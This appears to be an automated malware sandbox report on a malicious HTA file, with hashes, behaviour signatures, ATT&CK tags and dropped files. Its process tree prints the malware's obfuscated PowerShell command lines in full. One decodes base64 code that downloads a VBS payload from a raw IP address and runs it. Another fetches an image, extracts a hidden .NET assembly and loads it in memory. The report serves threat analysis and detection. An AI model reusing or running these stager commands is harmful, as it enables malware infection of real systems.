f42f2afb4ad2de01d20f30facd401761b6182a6a74997108e6ba827069e9a666

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-02-2025 19:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sheisverynicegirllokyetaroudntheglobalgoodnice.hta
Size

14KB
MD5

f5ec2118957b7a9908d1c588c50f4df9
SHA1

ee81165c895755372747a345116470489e3a902b
SHA256

f42f2afb4ad2de01d20f30facd401761b6182a6a74997108e6ba827069e9a666
SHA512

3f85fd0471313c2de3eb2c4b5fe672bb9f95b9bace50d428ac87722f3cb7e3a57177fae177d008632aa70ad7b018d67d15aaafbe229ebb3219073c3905c28775
SSDEEP

48:3NaPwm0vV7iaB9wm0vV7HYzBPTHtFVJt+AWnwJx81LKChaoWaAddIWwm0vV7I1ac:dmg7isg74zBPT3VJt+VnHYGG3g7ql

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	3044	powershell.exe
6	2988	powershell.exe
8	2988	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
304	cmd.exe
3044	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2988	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3044	powershell.exe
2988	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3060 wrote to memory of 304	3060	mshta.exe	31
PID 3060 wrote to memory of 304	3060	mshta.exe	31
PID 3060 wrote to memory of 304	3060	mshta.exe	31
PID 3060 wrote to memory of 304	3060	mshta.exe	31
PID 304 wrote to memory of 3044	304	cmd.exe	33
PID 304 wrote to memory of 3044	304	cmd.exe	33
PID 304 wrote to memory of 3044	304	cmd.exe	33
PID 304 wrote to memory of 3044	304	cmd.exe	33
PID 3044 wrote to memory of 2680	3044	powershell.exe	34
PID 3044 wrote to memory of 2680	3044	powershell.exe	34
PID 3044 wrote to memory of 2680	3044	powershell.exe	34
PID 3044 wrote to memory of 2680	3044	powershell.exe	34
PID 2680 wrote to memory of 2792	2680	csc.exe	35
PID 2680 wrote to memory of 2792	2680	csc.exe	35
PID 2680 wrote to memory of 2792	2680	csc.exe	35
PID 2680 wrote to memory of 2792	2680	csc.exe	35
PID 3044 wrote to memory of 2568	3044	powershell.exe	37
PID 3044 wrote to memory of 2568	3044	powershell.exe	37
PID 3044 wrote to memory of 2568	3044	powershell.exe	37
PID 3044 wrote to memory of 2568	3044	powershell.exe	37
PID 2568 wrote to memory of 2988	2568	WScript.exe	38
PID 2568 wrote to memory of 2988	2568	WScript.exe	38
PID 2568 wrote to memory of 2988	2568	WScript.exe	38
PID 2568 wrote to memory of 2988	2568	WScript.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheisverynicegirllokyetaroudntheglobalgoodnice.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3060
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOwerSHelL.EXE -eX bypass -NOP -W 1 -c devicecREDeNTIALDepLOYMEnT.eXE ; iEX($(IeX('[SYstEm.tEXT.ENCODiNG]'+[chaR]58+[chaR]58+'utF8.GetstRiNg([systEM.cOnvErt]'+[ChAr]0X3a+[CHar]58+'FRoMbASe64strING('+[cHAR]34+'JFZqb2hLVnZHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMbW9OLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdEYnosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVk8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRllxUk1qYlEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtckoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVTcEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWam9oS1Z2Rzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE4NS4yOS4xMC4zMC94YW1wcC9mYm8vc2hlaXNhZ29vZGdpcmx3aG9sb3Zlc215YmVzdGlyZWdvb2QuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzYWdvb2RnaXJsd2hvbG92ZXNteWJlc3RpcmVnb29kYmVzdGlyZWdvb2QudmJzIiwwLDApO1N0QXJULVNMRWVQKDMpO0lOdk9LZS1JVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzaGVpc2Fnb29kZ2lybHdob2xvdmVzbXliZXN0aXJlZ29vZGJlc3RpcmVnb29kLnZicyI='+[char]0x22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:304
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwerSHelL.EXE -eX bypass -NOP -W 1 -c devicecREDeNTIALDepLOYMEnT.eXE ; iEX($(IeX('[SYstEm.tEXT.ENCODiNG]'+[chaR]58+[chaR]58+'utF8.GetstRiNg([systEM.cOnvErt]'+[ChAr]0X3a+[CHar]58+'FRoMbASe64strING('+[cHAR]34+'JFZqb2hLVnZHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMbW9OLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdEYnosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVk8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRllxUk1qYlEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtckoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVTcEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWam9oS1Z2Rzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE4NS4yOS4xMC4zMC94YW1wcC9mYm8vc2hlaXNhZ29vZGdpcmx3aG9sb3Zlc215YmVzdGlyZWdvb2QuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzYWdvb2RnaXJsd2hvbG92ZXNteWJlc3RpcmVnb29kYmVzdGlyZWdvb2QudmJzIiwwLDApO1N0QXJULVNMRWVQKDMpO0lOdk9LZS1JVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzaGVpc2Fnb29kZ2lybHdob2xvdmVzbXliZXN0aXJlZ29vZGJlc3RpcmVnb29kLnZicyI='+[char]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7qvplt_3.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2680
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB33.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDB32.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2792
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheisagoodgirlwholovesmybestiregoodbestiregood.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2568
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwBlAGMAbgBhAG0AcgBvAGYAcgBlAHAAZQBpAHQAcwBlAGIAeQBtAGUAZQBzAC8AbwBiAGYALwBwAHAAbQBhAHgALwAwADMALgAwADEALgA5ADIALgA1ADgAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAbQB3AG4AbQBlAG0AYwBtAC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgANgA0ADUANgAyADkALwB1AG4AdwB5AGQAcgA0AG4AcgByAGsAYgBzAGYAZABqAHAAdwB6ADIALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAGEAcwBwAG4AZQB0AF8AYwBvAG0AcABpAGwAZQByACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7qvplt_3.dll

Filesize
3KB

MD5
fe6c357ceccefdaff188b4489e77f3d6

SHA1
f9cb34eb874a8bc817e60091eaa6aeaa19a47c37

SHA256
2a0e306175d9bbf10fdf955da18e040998600c7b8d01356685c89ef0fb8f0859

SHA512
ac1bf40cb212a285ffa92e14a95ca9c2e82e6d47884201e82dc5a7839616c3354bb08d67f213d30642b3d52997f63d0708152acff2cd67cc9a570581eea726ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\7qvplt_3.pdb

Filesize
7KB

MD5
8999cba1280f8aaea0dba2165fcb3cb0

SHA1
51520d8148356d3fcafa5ffbbafbf7f5c45c4dc1

SHA256
4d82a41977e5210fa60209749f450f3925d812c373de60af09aea4a8fac18e42

SHA512
0320b18af4b2ac2e44bca7f03356fb8fe44ad2b18771c1f2d60d9f3a3fe860066656d1eddf9179d53ce5511bfa179e7f8b61430ecf324019a9ebd9d4f4f3f01e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF7F8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDB33.tmp

Filesize
1KB

MD5
d54cee7d1b83903a8c447cb64a33602e

SHA1
dfa23a697af45e65b1712219beccedc89b893019

SHA256
821d069696d6b694c677314013073b0b4c09c5eb8d6f94fb7e9933507153c76f

SHA512
11b30ba65c12d6263cf6b3a0a1a874080b530659c9c681897e9468964eb22e1bc488cce8c2d707fba5e90cd3a97458dab4b45aa2b6fb4668693311bd1059a70d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF81A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EWE7MK8JY98C6KR3YDVM.temp

Filesize
7KB

MD5
06d7b0a594d100d9e2d2e1c8f7475a43

SHA1
a0df040e7a92ef5a861c19a845d77626378aa599

SHA256
1d4b7baaa1308c1fba299f43ec1597e85daebb836abfc5008a6b708941af849f

SHA512
c8fc79ee1403b10fc82865e633dd0f22f00441eb53904df21aa9954906ecafcd622b3df6ad971f25dcff6eb1571a68e3d8e51171c20659e721cfe8576ff74e27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
79bfe64b90e08079016ac3bb02c75cf2

SHA1
913b46120f58cc136042e08c54f32fa8540ae5a7

SHA256
9d380f636fae5cfd43520e5bc15cacba63fe64217ad11bb0f6e8f7919a32b3d0

SHA512
837a13649ed7676b820e01c7762a3f11711bdef74312611cce3c3e6423095856b374f2ae86f88f84f33f7a75a2f95420bd5cb5abb7e088e466562cd260813fef

Download Submit
C:\Users\Admin\AppData\Roaming\sheisagoodgirlwholovesmybestiregoodbestiregood.vbs

Filesize
216KB

MD5
47e3d5a5548cf3a9a292f5b90a3129a1

SHA1
224cf22a37892c36d14910a3bd8b421a787c4f78

SHA256
c6a8405820ea5f76706626a0afaa41b02fa24095748cd32fd391831362857c1d

SHA512
c9d9bdb076df63926a211eadb5aba1ec1599bcc2bf01e7545053f5abdd975056bf2cd1bb643530d9b60e14e60bf826c393980c9b395fc26e3eebca5ca3c0d004

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7qvplt_3.0.cs

Filesize
459B

MD5
321557568a71ac2e7582195c0bcf8e5a

SHA1
7dc90f6afdff0242e4a8845a467ba90a4d17a07c

SHA256
90c209f1331fce37679f6e9b72e8896d19215661fda884efd208b4667824cb3a

SHA512
b8f8fe949bd814dfcb2314b2af8e0650c2f18a5f277e0a50cfd32b210fdcef9ab8d201e0b137cd52ab3bd00f8c1d7cbcac20b8c65aefeba55beb14e697b5761d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7qvplt_3.cmdline

Filesize
309B

MD5
6ca5ae61143969fda0c45681d27b75ca

SHA1
191d98995df7cbe27c2ee3d1da22327088e497b9

SHA256
7944e0f4bce76210ebeab0d0377ed0115e1d85a29d10d7a7bf2b4cb47f8169ed

SHA512
b52652ab3f3568f1cfdebc87500b3364476e51987db7bc1e743c0b0e9db320fae4ecc5298eaaac5245f690b9b95cc04e9039def592750ffc25b6b7896eb9200f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDB32.tmp

Filesize
652B

MD5
16df2eff0c9b00aef56f8f8b856494ee

SHA1
f1eee30f7cb105070e1535ba458ca4a0f13785c3

SHA256
3422388cf57b4cca37e7c72117d0d5a147e33d8bda11f61dc475c565be3a2ef8

SHA512
f6db5dfc8e39d2aa3d2263aba5754737199f508c79af8a25c5f2e84444fe562df83933ebac5637a271743e60857acacc49be35b5cbccbda971c48b803893ba0c

Download Submit